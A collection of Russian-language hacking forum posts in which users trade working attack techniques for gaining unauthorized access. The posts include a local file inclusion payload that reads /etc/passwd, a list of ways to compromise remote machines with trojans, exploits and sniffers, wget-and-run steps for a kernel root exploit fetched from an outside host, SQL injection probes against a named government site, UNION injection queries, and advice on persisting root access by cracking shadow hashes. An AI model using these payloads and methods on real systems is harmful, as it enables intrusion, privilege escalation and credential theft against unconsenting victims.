В Windows это не проблема, в пути вполне могут находится несуществующие папки. А вот в Linux такое непозволительно, выходом из сложившейся ситуации может быть подобная конструкция: Code: include('page[COLOR=Red]1.php/../../../../../../../etc/passwd%00[/COLOR].php'); При условии что файл page1.php существует, файл /etc/passwd будет проинклужен.
Я на всякий случай проверил код - на gentoo linux сработало как с добавлением слеша, так и вообще без него, т.е. ?lfi=../../../../../../../../etc/passwd работает.
1 Запустить троян на удалённый комп - найти приват трой или купить его билд. - послать ссылку с ****** / либо тупо впарить. 2 Использовать Сплоиты - найти свежую дырку (в баг листах) - ну и естественно придётся порты сканить на наличие уязвимых сервисов. 3 Сканеры расшаренных ресурсов + сканеры портов и т.п. - берём сканер заряжаем свой диапазон и в путь. Есть p2p-сеть значит многие расшарили свои диски. 4 Снифание трафика. - вешаем снифер и ловим пароли. 5 Можно взломать роутер.
Есть шелл на сервер. Нада получить рута. Беру этот сплойт: http://www.woneninjeelement.nl/images/stories/2.4.x%20and%202.6.x.txt (рутать надо не этот сайт) При копмиляции выдаёт кучу ошибок Может нужно сплойт подправить, хз ядро - Linux 2.6.18 . Подскажите что можно сделать... мб нужно другой сплойт?
Code: uname -a Покажи что выводит данная команда. Если ядро обновлено до 13 августа этого года, то используй эксплоит sock_sendpage - http://milw0rm.com/exploits/9641 Юзать примерно так: Code: cd /tmp mkdir my chmod 777 my cd my wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz tar xvfz 2009-linux-sendpage3.tar.gz chmod 777 linux-sendpage3 -R cd linux-sendpage3 ./run id
http://www.pz.gov.ua/login/login.php?lid=1 при подставлении кавычки в поле логин... шибка во время выполнения запроса: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 а так http://www.pz.gov.ua/login/login.php?lid=-1 ORA-00936: missing expression это как понимать? один сайт работает на разных БД?
Получил рута через бэк-коннект. Как теперь сделать чтобы смог подключиться через putty? Мб расшифровать хэш рута с /etc/shadow? Есть еще какие-то способы?
Я написал что права рута уже есть! Только через cmd, нада сделать чтобы смог подключится через пути (ssh) как?
Здравствуйте! Товарищи нужна ваша помощь. В общем проблема заключается в следующем: Нашел одну уязвимость на сайте в общем определил базу, колонки. Сделал запрос след. вида: http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(column_name),14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.columns+where+table_name=0x7573657273-- колонки видно все норм далее http://site.php/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,user,14,15,16,17,18,19,20,21,22,23,24,25+from+users-- он выдает ошибку след. содержания: Query failed: Table 'site.users' doesn't exist походу тут стоят ограничения. как обойти подскажите плиз, какой надо сформировать запрос?
25+from+table.db или 25+from+db.table точно не помню , мне Пашкелла как то описывал способ этот, благодарен ему)